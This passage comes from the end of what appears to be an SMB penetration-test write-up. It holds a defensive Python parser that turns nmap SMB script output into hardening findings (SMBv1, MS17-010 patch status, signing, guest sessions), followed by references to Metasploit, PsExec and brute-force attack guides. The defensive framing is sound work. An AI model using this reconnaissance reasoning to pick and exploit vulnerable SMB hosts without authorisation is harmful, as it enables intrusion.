IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
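Both the smb-protocols check earlier (SMBv1 through v3 all enabled, signing required) and the reasoning just before the Metasploit run (guest session accepted, 2012 R2, so suspect MS17-010) are judgements a defender can automate from the same nmap output. The following Python is an added example (my own code, not from this write-up): a small parser for nmap's host-script sections that turns smb-protocols, smb2-security-mode, smb-security-mode and smb-os-discovery into a hardening checklist. The excerpt it reads is constructed in nmap's format from the kind of results shown above (dialects appear as "3:0:2", "3.0.2" or "302" depending on the nmap version, so the parser normalises all three); the severities are my assumptions.

```python
"""Turn nmap's SMB host-script output into a hardening checklist.

Added example, not part of the original write-up. SAMPLE_NMAP is a
constructed excerpt in nmap's host-script format; severities are assumptions.
"""
import re

SAMPLE_NMAP = """\
Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2:0:2
|     2:1:0
|     3:0:0
|_    3:0:2
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
|   Computer name: 2012-DC
|_  Domain name: ECC.LOCALNET
"""

# Multi-line script header: "| name:" with exactly one space after the bar
# (nested keys such as "|   dialects:" are indented further and do not match).
SCRIPT_HEADER = re.compile(r"^\| ([\w-]+):$")
# Single-line script: "|_name: value"
ONE_LINER = re.compile(r"^\|_([\w-]+): (.*)$")


def parse_nse(text):
    """Split host-script output into {script_name: [stripped lines]}."""
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        header, one = SCRIPT_HEADER.match(raw), ONE_LINER.match(raw)
        if header:
            current = header.group(1)
            scripts[current] = []
        elif one:
            scripts[one.group(1)] = [one.group(2).strip()]
            current = None
        elif current is not None:
            scripts[current].append(raw.lstrip("|_ ").rstrip())
    return scripts


def normalize_dialect(token):
    """'3:0:2', '3.0.2' and '302' all become '302'; anything else -> None."""
    digits = re.sub(r"[:.]", "", token.strip())
    return digits if re.fullmatch(r"[23]\d\d", digits) else None


def assess(text):
    """Return the SMB facts for one host plus a list of findings."""
    s = parse_nse(text)
    proto = s.get("smb-protocols", [])
    sec2 = s.get("smb2-security-mode", [])
    sec1 = s.get("smb-security-mode", [])
    osd = s.get("smb-os-discovery", [])
    facts = {
        "smbv1": any("SMBv1" in line for line in proto),
        "dialects": [d for d in map(normalize_dialect, proto) if d],
        "signing_required": any("enabled and required" in line for line in sec2),
        "guest_session": any(line == "account_used: guest" for line in sec1),
        "os": next((line[3:].strip() for line in osd if line.startswith("OS:")), ""),
    }
    findings = []
    if facts["smbv1"]:
        findings.append("HIGH: SMBv1 offered; disable it "
                        "(Set-SmbServerConfiguration -EnableSMB1Protocol $false)")
        findings.append("HIGH: confirm the MS17-010 (March 2017) update is installed; "
                        "SMBv1 is the surface EternalBlue-class exploits need")
    if not facts["signing_required"]:
        findings.append("MEDIUM: SMB2 signing not required; NTLM relay becomes possible")
    if facts["guest_session"]:
        findings.append("LOW: guest/anonymous SMB session accepted; restrict null sessions")
    facts["findings"] = findings
    return facts


if __name__ == "__main__":
    result = assess(SAMPLE_NMAP)
    print(result["os"], "dialects:", ", ".join(result["dialects"]))
    for finding in result["findings"]:
        print(" -", finding)
```

On the sample this yields two HIGH findings for SMBv1 (disable it, verify MS17-010) and one LOW for the guest session, and no signing finding because signing is already required; changing the smb2-security-mode line to "enabled but not required" adds the MEDIUM relay finding. The point of the exercise from the defender's chair is that the combination the write-up uses to justify trying MS17-010 (SMBv1 on, old build) is visible in a routine scan long before anyone runs the exploit.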
Reference
SMB (Server Message Block) Pentesting | Exploit Notes
Attacking SMB via Metasploit and PSexec
How to Perform SMB Login Control in MSF in Penetration Tests? – SYSTEMCONF
[Brute force] Brute-force tool crowbar | Davidou的 Blog